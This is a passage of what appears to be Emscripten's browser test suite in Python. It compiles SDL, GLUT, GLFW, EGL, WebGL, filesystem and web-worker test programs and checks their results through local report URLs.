self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_sdl_mouse(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, 0, null); Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_sdl_mouse_offsets(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, x, y, x, y, 0, 0, 0, 0, 0, null); Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') create_file('page.html', ''' <html> <head> <style type="text/css"> html, body { margin: 0; padding: 0; } #container { position: absolute; left: 5px; right: 0; top: 5px; bottom: 0; } #canvas { position: absolute; left: 0; width: 600px; top: 0; height: 450px; } textarea { margin-top: 500px; margin-left: 5px; width: 600px; } </style> </head> <body> <div id="container"> <canvas id="canvas"></canvas> </div> <textarea id="output" rows="8"></textarea> <script type="text/javascript"> var Module = { canvas: document.getElementById('canvas'), print: (function() { var element = document.getElementById('output'); element.value = ''; // clear browser cache return function(text) { if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' '); element.value += text + "\\n"; element.scrollTop = element.scrollHeight; // focus on bottom }; })() }; </script> <script type="text/javascript" src="sdl_mouse.js"></script> </body> </html> ''') self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_glut_touchevents(self): self.btest_exit('glut_touchevents.c', args=['-lglut']) def test_glut_wheelevents(self): self.btest_exit('glut_wheelevents.c', args=['-lglut']) @requires_graphics_hardware def test_glut_glutget_no_antialias(self): self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL']) self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']) # This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer. @requires_graphics_hardware def test_glut_glutget(self): self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL']) self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']) def test_sdl_joystick_1(self): # Generates events corresponding to the Working Draft of the HTML5 Gamepad API. # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface create_file('pre.js', ''' var gamepads = []; // Spoof this function. navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; gamepads.push({ axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }); var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0; }; window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button] = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button] = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']) def test_sdl_joystick_2(self): # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API. # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad create_file('pre.js', ''' var gamepads = []; // Spoof this function. navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; gamepads.push({ axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }); var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; // Buttons are objects for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 }; }; // FF mutates the original objects. window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button].pressed = true; gamepads[index].buttons[button].value = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button].pressed = false; gamepads[index].buttons[button].value = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL']) @requires_graphics_hardware def test_glfw_joystick(self): # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API. # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad create_file('pre.js', ''' var gamepads = []; // Spoof this function. navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; var gamepad = { axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }; gamepads.push(gamepad) var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; // Buttons are objects for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 }; // Dispatch event (required for glfw joystick; note not used in SDL test) var event = new Event('gamepadconnected'); event.gamepad = gamepad; window.dispatchEvent(event); }; // FF mutates the original objects. window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button].pressed = true; gamepads[index].buttons[button].value = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button].pressed = false; gamepads[index].buttons[button].value = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3']) @requires_graphics_hardware def test_webgl_context_attributes(self): # Javascript code to check the attributes support we want to test in the WebGL implementation # (request the attribute, create a context and check its value afterwards in the context attributes). # Tests will succeed when an attribute is not supported. create_file('check_webgl_attributes_support.js', ''' mergeInto(LibraryManager.library, { webglAntialiasSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {antialias: true}); attributes = context.getContextAttributes(); return attributes.antialias; }, webglDepthSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {depth: true}); attributes = context.getContextAttributes(); return attributes.depth; }, webglStencilSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {stencil: true}); attributes = context.getContextAttributes(); return attributes.stencil; }, webglAlphaSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {alpha: true}); attributes = context.getContextAttributes(); return attributes.alpha; } }); ''') # Copy common code file to temporary directory filepath = test_file('test_webgl_context_attributes_common.c') temp_filepath = os.path.basename(filepath) shutil.copyfile(filepath, temp_filepath) # perform tests with attributes activated self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW']) # perform tests with attributes desactivated self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW']) @requires_graphics_hardware def test_webgl_no_double_error(self): self.btest_exit('webgl_error.cpp') @requires_graphics_hardware def test_webgl_parallel_shader_compile(self): self.btest_exit('webgl_parallel_shader_compile.cpp') @requires_graphics_hardware def test_webgl_explicit_uniform_location(self): self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2']) @requires_graphics_hardware def test_webgl_sampler_layout_binding(self): self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1']) @requires_graphics_hardware def test_webgl2_ubo_layout_binding(self): self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2']) # Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context. @requires_graphics_hardware def test_preinitialized_webgl_context(self): self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')]) @requires_threads def test_emscripten_get_now(self): for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]: self.btest_exit('emscripten_get_now.cpp', args=args) def test_write_file_in_environment_web(self): self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1']) def test_fflush(self): self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE) def test_file_db(self): secret = str(time.time()) create_file('moar.txt', secret) self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST']) shutil.copyfile('test.html', 'first.html') self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM']) shutil.copyfile('test.html', 'second.html') create_file('moar.txt', 'aliantha') self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it shutil.move('test.html', 'third.html') def test_fs_idbfs_sync(self): for extra in [[], ['-DEXTRA_WORK']]: secret = str(time.time()) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra) def test_fs_idbfs_sync_force_exit(self): secret = str(time.time()) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js']) def test_fs_idbfs_fsync(self): # sync from persisted state into memory before main() create_file('pre.js', ''' Module.preRun = function() { addRunDependency('syncfs'); FS.mkdir('/working1'); FS.mount(IDBFS, {}, '/working1'); FS.syncfs(true, function (err) { if (err) throw err; removeRunDependency('syncfs'); }); }; ''') args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY'] secret = str(time.time()) self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js']) self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js']) def test_fs_memfs_fsync(self): args = ['-sASYNCIFY', '-sEXIT_RUNTIME'] secret = str(time.time()) self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"']) def test_fs_workerfs_read(self): secret = 'a' * 10 secret2 = 'b' * 10 create_file('pre.js', ''' var Module = {}; Module.preRun = function() { var blob = new Blob(['%s']); var file = new File(['%s'], 'file.txt'); FS.mkdir('/work'); FS.mount(WORKERFS, { blobs: [{ name: 'blob.txt', data: blob }], files: [file], }, '/work'); }; ''' % (secret, secret2)) self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js']) def test_fs_workerfs_package(self): create_file('file1.txt', 'first') ensure_dir('sub') open(Path('sub/file2.txt'), 'w').write('second') self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js']) self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js']) def test_fs_lz4fs_package(self): # generate data ensure_dir('subdir') create_file('file1.txt', '0123456789' * (1024 * 128)) open(Path('subdir/file2.txt'), 'w').write('1234567890' * (1024 * 128)) random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1)) random_data[17] = ord('X') open('file3.txt', 'wb').write(random_data) # compress in emcc, -sLZ4 tells it to tell the file packager print('emcc-normal') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt']) assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1 assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone print(' emcc-opts') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2']) # compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage print('normal') out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4']) open('files.js', 'wb').write(out) self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM']) print(' opts') self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2']) print(' modularize') self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1']) create_file('a.html', ''' <script src="a.out.js"></script> <script> Module() </script> ''') self.run_browser('a.html', '.', '/report_result?2') # load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended print('manual') subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js']) self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM']) print(' opts') self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2']) print(' opts+closure') self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet']) '''# non-lz4 for comparison try: os.mkdir('files') except OSError: pass shutil.copyfile('file1.txt', Path('files/file1.txt')) shutil.copyfile('file2.txt', Path('files/file2.txt')) shutil.copyfile('file3.txt', Path('files/file3.txt')) out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt']) open('files.js', 'wb').write(out) self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])''' def test_separate_metadata_later(self): # see issue #6654 - we need to handle separate-metadata both when we run before # the main program, and when we are run later create_file('data.dat', ' ') self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js']) self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM']) def test_idbstore(self): secret = str(time.time()) for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]: self.clear() print(stage) self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"']) def test_idbstore_sync(self): secret = str(time.time()) self.clear() self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY']) def test_idbstore_sync_worker(self): secret = str(time.time()) self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY']) def test_force_exit(self): self.btest_exit('force_exit.c', assert_returncode=10) def test_sdl_pumpevents(self): # key events should be detected using SDL_PumpEvents create_file('pre.js', ''' function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } ''') self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL']) def test_sdl_canvas_size(self): self.btest_exit('sdl_canvas_size.c', args=['-O2', '--minify=0', '--shell-file', test_file('sdl_canvas_size.html'), '-lSDL', '-lGL']) @requires_graphics_hardware def test_sdl_gl_read(self): # SDL, OpenGL, readPixels self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']) self.run_browser('something.html', '.', '/report_result?1') @requires_graphics_hardware def test_sdl_gl_mapbuffers(self): self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'], message='You should see a blue triangle.') @requires_graphics_hardware def test_sdl_ogl(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_regal(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_defaultmatrixmode(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_p(self): # Immediate mode with pointers shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1, args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with gray at the top.') @requires_graphics_hardware def test_sdl_ogl_proc_alias(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1, args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL']) @requires_graphics_hardware def test_sdl_fog_simple(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png', args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_negative(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_density(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_exp2(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl_fog_linear(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1, args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'], message='You should see an image with fog.') @requires_graphics_hardware def test_glfw(self): self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL']) self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL']) def test_glfw_minimal(self): self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL']) self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL']) def test_glfw_time(self): self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL']) def _test_egl_base(self, *args): self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args)) @requires_graphics_hardware def test_egl(self): self._test_egl_base() @requires_threads @requires_graphics_hardware def test_egl_with_proxy_to_pthread(self): self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER') def _test_egl_width_height_base(self, *args): self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args)) def test_egl_width_height(self): self._test_egl_width_height_base() @requires_threads def test_egl_width_height_with_proxy_to_pthread(self): self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD') @requires_graphics_hardware def test_egl_createcontext_error(self): self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL']) def test_worker(self): # Test running in a web worker create_file('file.dat', 'data for worker') html_file = open('main.html', 'w') html_file.write(''' <html> <body> Worker Test <script> var worker = new Worker('worker.js'); worker.onmessage = function(event) { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:%s/report_result?' + event.data); xhr.send(); setTimeout(function() { window.close() }, 1000); }; </script> </body> </html> ''' % self.port) html_file.close() for file_data in [1, 0]: cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) print(cmd) self.run_process(cmd) self.assertExists('worker.js') self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':') self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too @no_firefox('keeps sending OPTIONS requests, and eventually errors') def test_chunked_synchronous_xhr(self): main = 'chunked_sync_xhr.html' worker_filename = "download_and_checksum_worker.js" html_file = open(main, 'w') html_file.write(r""" <!doctype html> <html> <head><meta charset="utf-8"><title>Chunked XHR</title></head> <body> Chunked XHR Web Worker Test <script> var worker = new Worker(""" + json.dumps(worker_filename) + r"""); var buffer = []; worker.onmessage = function(event) { if (event.data.channel === "stdout") { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line); xhr.send(); setTimeout(function() { window.close() }, 1000); } else { if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); }); if (event.data.line) { console.error(event.data.line); } else { var v = event.data.char; if (v == 10) { var line = buffer.splice(0); console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join('')); } else { buffer.push(v); } } } }; </script> </body> </html> """ % self.port) html_file.close() c_source_filename = "checksummer.c" prejs_filename = "worker_prejs.js" prejs_file = open(prejs_filename, 'w') prejs_file.write(r""" if (typeof(Module) === "undefined") Module = {}; Module["arguments"] = ["/bigfile"]; Module["preInit"] = function() { FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false); }; var doTrace = true; Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); }; Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; }; """) prejs_file.close() # vs. os.path.join(self.get_dir(), filename) # vs. test_file('hello_world_gles.c') self.compile_btest([test_file(c_source_filename), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename, '--pre-js', prejs_filename]) chunkSize = 1024 data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port)) server.start() # block until the server is actually ready for i in range(60): try: urlopen('http://localhost:11111') break except Exception as e: print('(sleep for server)') time.sleep(1) if i == 60: raise e try: self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum)) finally: server.terminate() # Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't # attempt to rmdir() files in use. if WINDOWS: time.sleep(2) @requires_graphics_hardware def test_glgears(self, extra_args=[]): self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3, args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args) @requires_graphics_hardware @requires_threads def test_glgears_pthreads(self, extra_args=[]): # test that a program that doesn't use pthreads still works with with pthreads enabled # (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672) self.test_glgears(['-sUSE_PTHREADS']) @requires_graphics_hardware @parameterized({ '': ([False],), # Enabling FULL_ES3 also enables ES2 automatically 'proxy': ([True],) }) def test_glgears_long(self, proxy): args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] if proxy: args += ['--proxy-to-worker'] self.btest('hello_world_gles.c', expected='0', args=args) @requires_graphics_hardware def test_glgears_animation(self): for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']: print(filename) cmd = [test_file(filename), '-o', 'something.html', '-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut', '--shell-file', test_file('hello_world_gles_shell.html')] if 'full' in filename: cmd += ['-sFULL_ES2=1'] self.compile_btest(cmd) self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true') @requires_graphics_hardware def test_fulles2_sdlproc(self): 